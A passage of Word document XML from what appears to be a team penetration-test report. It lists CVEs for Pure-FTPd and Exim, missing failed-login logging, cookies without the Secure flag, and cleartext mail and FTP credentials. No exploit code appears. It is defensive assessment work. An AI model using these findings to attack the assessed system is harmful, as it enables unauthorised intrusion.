    <w:p w14:paraId="3A6136FC" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="00A45568">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="704031F7" wp14:editId="69C9BFD9">
            <wp:extent cx="5943600" cy="489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89585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8741C1" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF"/>
    <w:p w14:paraId="65F26BA4" w14:textId="1A3D7B0E" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lastly, with the Server service components identified, Pure-FTPd had recorded vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidRPr="003712E4">
        <w:t>CVE-2021-40524</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capable of conducting DoS attacks, </w:t>
      </w:r>
      <w:r w:rsidRPr="003712E4">
        <w:t>CVE-2019-20176</w:t>
      </w:r>
      <w:r w:rsidR="001A727E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and even </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60B47">
        <w:t>CVE-2017-12170</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which had packaging errors were identified</w:t>
      </w:r>
      <w:r w:rsidR="005D1FD6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D1FD6">
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">owever, the version number could </w:t>
      </w:r>
      <w:r w:rsidR="004775DB">
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">be made </w:t>
      </w:r>
      <w:r w:rsidR="00A645EB">
        <w:t>known</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the tools at the team’s disposal hence the CVEs could not be explored further without further understanding. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20186D50" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRPr="009B0A27" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="000049C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD1D00E" wp14:editId="3B279C54">
            <wp:extent cx="5943600" cy="483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83870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64265DC4" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="0080275A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A50413" wp14:editId="4A9A4AA2">
            <wp:extent cx="5943600" cy="4165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6560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE821E3" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="00F44FCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C2DFAE7" wp14:editId="2AFF1F6D">
            <wp:extent cx="5943600" cy="476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76885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68DAB5" w14:textId="5042F87C" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r>
        <w:t xml:space="preserve">Exim smtpd version 4.94.2 </w:t>
      </w:r>
      <w:r w:rsidR="009121AA">
        <w:t>had vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00221AEE">
        <w:t>CVE-2020-28007, CVE-2020-28008</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> were identified that could elevate </w:t>
      </w:r>
      <w:r w:rsidR="004775DB">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>user to root level privileges without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439B120B" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="00C75DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18655238" wp14:editId="020FFBF9">
            <wp:extent cx="5943600" cy="4140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4020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1003FE" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="00BC2746">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4239D4" wp14:editId="19B1409A">
            <wp:extent cx="5943600" cy="478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78155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1475F281" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRPr="009B0A27" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF"/>
    <w:p w14:paraId="131F3D39" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF6370" w14:textId="40082278" w:rsidR="002E20C0" w:rsidRDefault="002E20C0" w:rsidP="00BA5918">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc94100241"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Insufficient Logging &amp; Monitoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="70BAACF9" w14:textId="3743D2C7" w:rsidR="00775377" w:rsidRPr="00775377" w:rsidRDefault="00775377" w:rsidP="00775377">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701196D" w14:textId="4AD1200F" w:rsidR="002632E1" w:rsidRDefault="002632E1" w:rsidP="00966EDA">
      <w:r>
        <w:t xml:space="preserve">Insufficient logging and monitoring are when </w:t>
      </w:r>
      <w:r w:rsidRPr="00F87E5C">
        <w:t>vital</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security</w:t>
      </w:r>
      <w:r w:rsidRPr="00F87E5C">
        <w:t xml:space="preserve"> information logs are missing, or there is a lack of adequate log format, context, storage, security, and response time to detect an event or breach.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> These include logs such as authentication failure, unauthorized access detected, and attempted intrusions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC7850D" w14:textId="016BFF26" w:rsidR="00321129" w:rsidRPr="00321129" w:rsidRDefault="00321129" w:rsidP="00966EDA">
      <w:r>
        <w:t xml:space="preserve">After failing multiple </w:t>
      </w:r>
      <w:r w:rsidR="00E378A3">
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attempts into admin123 account, </w:t>
      </w:r>
      <w:r w:rsidR="00E378A3">
        <w:t xml:space="preserve">no failed </w:t>
      </w:r>
      <w:r w:rsidR="00104558">
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="00E378A3">
        <w:t xml:space="preserve"> audit logs </w:t>
      </w:r>
      <w:r w:rsidR="00C64E2C">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00E378A3">
        <w:t xml:space="preserve"> recorded. This can </w:t>
      </w:r>
      <w:r w:rsidR="005E444B">
        <w:t xml:space="preserve">result in </w:t>
      </w:r>
      <w:r w:rsidR="00EC16E1">
        <w:t>an attacker</w:t>
      </w:r>
      <w:r w:rsidR="005E444B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90C3F">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005E444B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E22453">
        <w:t>brute-forc</w:t>
      </w:r>
      <w:r w:rsidR="00E90C3F">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00E22453">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00291A9B">
        <w:t>credentials without being detected by the web application administrator.</w:t>
      </w:r>
      <w:r w:rsidR="00D44818" w:rsidRPr="00D44818">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A57C3DA" w14:textId="27281060" w:rsidR="00321129" w:rsidRPr="00321129" w:rsidRDefault="00D44818" w:rsidP="00321129">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658298" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3919C9DC" wp14:editId="4592742D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1041253</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1249702</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3076190" cy="1945082"/>
                <wp:effectExtent l="0" t="0" r="10160" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="111" name="Rectangle 111"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3076190" cy="19450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518B34">
              <v:rect id="Rectangle 111" style="position:absolute;margin-left:82pt;margin-top:98.4pt;width:242.2pt;height:153.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A3C3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9/gwIAAGo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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00321129" w:rsidRPr="00321129">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72C50A59" wp14:editId="7016F17E">
            <wp:extent cx="5943600" cy="3160395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="57" name="Picture 5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website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3160395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54754EA5" w14:textId="77777777" w:rsidR="00C767BD" w:rsidRDefault="00C767BD" w:rsidP="00C767BD"/>
    <w:p w14:paraId="335DB80D" w14:textId="77777777" w:rsidR="002632E1" w:rsidRDefault="002632E1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc93487302"/>
      <w:bookmarkStart w:id="103" w:name="_Toc93502879"/>
      <w:bookmarkStart w:id="104" w:name="_Toc93526914"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="416B4C74" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc94100242"/>
      <w:bookmarkStart w:id="106" w:name="_Toc93526915"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidRPr="008C18A2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t xml:space="preserve">pplication </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t xml:space="preserve">ookies </w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t xml:space="preserve">ot </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t xml:space="preserve">arked </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t>ecure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="4C60CE3E" w14:textId="33738FAC" w:rsidR="002622EE" w:rsidRPr="004718B9" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002716AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D4F1AC" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:r w:rsidRPr="001D59AE">
        <w:t>The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, there are instances where the application is running over unencrypted HTTP or the cookies are not marked 'secure', meaning the browser could send them back over an unencrypted link under certain circumstances. As a result, it may be possible for a remote attacker to intercept these cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C482275" w14:textId="33802E86" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:r>
        <w:t xml:space="preserve">Upon accessing the web application using HTTP instead of HTTPS, the Secure attribute in the Cookie is not marked. This does not pose as a huge threat as the web application enforces HTTPS and this vulnerability is only exposed if the client accessed </w:t>
      </w:r>
      <w:r w:rsidR="000C0C09">
        <w:t xml:space="preserve">the web application </w:t>
      </w:r>
      <w:r>
        <w:t>through unsecured means.</w:t>
      </w:r>
      <w:r w:rsidR="00A935E6" w:rsidRPr="00A935E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565ECD93" w14:textId="1E6DA4F9" w:rsidR="002622EE" w:rsidRDefault="00A935E6" w:rsidP="002622EE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658299" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A95A803" wp14:editId="0154FD6B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4936703</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1602853</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="357898" cy="191083"/>
                <wp:effectExtent l="0" t="0" r="23495" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="112" name="Rectangle 112"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="357898" cy="1910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AF016A">
              <v:rect id="Rectangle 112" style="position:absolute;margin-left:388.7pt;margin-top:126.2pt;width:28.2pt;height:15.0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D77F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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002622EE" w:rsidRPr="009F3C6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="682E88D1" wp14:editId="5C43B7F4">
            <wp:extent cx="6020131" cy="1793174"/>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11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6099921" cy="1816941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E016FE6" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D76915" w14:textId="6D611FC1" w:rsidR="007066D8" w:rsidRDefault="004174F7" w:rsidP="00436549">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc94100243"/>
      <w:r>
        <w:t>Other</w:t>
      </w:r>
      <w:r w:rsidR="00812E33">
        <w:t xml:space="preserve"> Testing Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="100903FD" w14:textId="5F862C5C" w:rsidR="005014C5" w:rsidRPr="00427C36" w:rsidRDefault="009801A7" w:rsidP="00966EDA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00E239CB">
        <w:t xml:space="preserve">e web application was tested for </w:t>
      </w:r>
      <w:r w:rsidR="001C37E5">
        <w:t>A3:2017-</w:t>
      </w:r>
      <w:r w:rsidR="00D700FF">
        <w:t xml:space="preserve">Sensitive Data </w:t>
      </w:r>
      <w:r w:rsidR="00630F08">
        <w:t>Exposure, A</w:t>
      </w:r>
      <w:r w:rsidR="003454F9">
        <w:t>4:2017-XML External Entities (XXE), and A8:2017-Insecure Deserialization</w:t>
      </w:r>
      <w:r w:rsidR="00630F08">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A942E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470182">
        <w:t>However, r</w:t>
      </w:r>
      <w:r w:rsidR="00146EF4">
        <w:t>egarding XXE</w:t>
      </w:r>
      <w:r w:rsidR="00630F08">
        <w:t>, no potential indicators of the stated vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00CD6D2D">
        <w:t>y vector</w:t>
      </w:r>
      <w:r w:rsidR="00AC7861">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B2AA1">
        <w:t xml:space="preserve">could be identified through </w:t>
      </w:r>
      <w:r w:rsidR="001C4626">
        <w:t>analy</w:t>
      </w:r>
      <w:r w:rsidR="005B3BD5">
        <w:t xml:space="preserve">zing the </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A3F">
        <w:t>web application source code</w:t>
      </w:r>
      <w:r w:rsidR="00793657">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B1A4F">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="00DB32FC">
        <w:t xml:space="preserve">well as usage of tools such as Burp Suite and </w:t>
      </w:r>
      <w:r w:rsidR="007366FD">
        <w:t>the b</w:t>
      </w:r>
      <w:r w:rsidR="001B19E8">
        <w:t>rowser Developer Tools</w:t>
      </w:r>
      <w:r w:rsidR="00B1610D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D66318">
        <w:t xml:space="preserve">Moreover, Sensitive Data Exposure and Insecure Deserialization </w:t>
      </w:r>
      <w:r w:rsidR="00ED107F">
        <w:t>could not</w:t>
      </w:r>
      <w:r w:rsidR="008E3AD8">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidR="00ED107F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF1200">
        <w:t>verified</w:t>
      </w:r>
      <w:r w:rsidR="00C12F54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0035530A">
        <w:t xml:space="preserve">due to </w:t>
      </w:r>
      <w:r w:rsidR="00DF50BB">
        <w:t xml:space="preserve">unsuccessful </w:t>
      </w:r>
      <w:r w:rsidR="008E4C4B">
        <w:t xml:space="preserve">attempts in </w:t>
      </w:r>
      <w:r w:rsidR="000E7CA8">
        <w:t xml:space="preserve">identifying </w:t>
      </w:r>
      <w:r w:rsidR="001F6233">
        <w:t xml:space="preserve">entry </w:t>
      </w:r>
      <w:r w:rsidR="000E7CA8">
        <w:t>point</w:t>
      </w:r>
      <w:r w:rsidR="001F6233">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="001C032E">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="008E4C4B">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00510DE2">
        <w:t xml:space="preserve"> researched</w:t>
      </w:r>
      <w:r w:rsidR="008E4C4B">
        <w:t xml:space="preserve"> vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="001C032E">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="008E4C4B">
        <w:t xml:space="preserve"> as well as </w:t>
      </w:r>
      <w:r w:rsidR="009D37A9">
        <w:t>the team’s lack of expertise.</w:t>
      </w:r>
      <w:r w:rsidR="005516EE">
        <w:t xml:space="preserve"> Hence, </w:t>
      </w:r>
      <w:r w:rsidR="00E5028C">
        <w:t>the presen</w:t>
      </w:r>
      <w:r w:rsidR="00D56803">
        <w:t>ce of</w:t>
      </w:r>
      <w:r w:rsidR="005516EE">
        <w:t xml:space="preserve"> these vulnerabilities could not be </w:t>
      </w:r>
      <w:r w:rsidR="00906119">
        <w:t>verified</w:t>
      </w:r>
      <w:r w:rsidR="00A34967">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="2F5A1172">
        <w:t>identified</w:t>
      </w:r>
      <w:r w:rsidR="004522D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE0204">
        <w:t>within the</w:t>
      </w:r>
      <w:r w:rsidR="004522D2">
        <w:t xml:space="preserve"> web application</w:t>
      </w:r>
      <w:r w:rsidR="005516EE">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="108" w:name="_Toc93487303"/>
      <w:bookmarkStart w:id="109" w:name="_Toc93502880"/>
    </w:p>
    <w:p w14:paraId="538BD810" w14:textId="77777777" w:rsidR="007B7FA7" w:rsidRDefault="007B7FA7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc93526916"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBFD82" w14:textId="44105285" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc93839316"/>
      <w:bookmarkStart w:id="112" w:name="_Toc94100244"/>
      <w:r w:rsidRPr="008C18A2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">FTP, POP, IMAP, and SMTP </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t xml:space="preserve">redentials </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t xml:space="preserve">ransmitted </w:t>
      </w:r>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="008C18A2">
        <w:t>nencrypted</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="4384C4B3" w14:textId="3CB05314" w:rsidR="002622EE" w:rsidRPr="00ED3244" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:r>
        <w:t xml:space="preserve">These protocols are detected to be transmitting credentials in </w:t>
      </w:r>
      <w:r w:rsidR="00F51319">
        <w:t>cleartext</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577ACFDB" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F56F2">
        <w:t>If an attacker were to intercept traffic between a client and this server, the credentials would be exposed.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>This vulnerability was detected by Nexpose during vulnerability scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84F3AE" w14:textId="7CEF3241" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
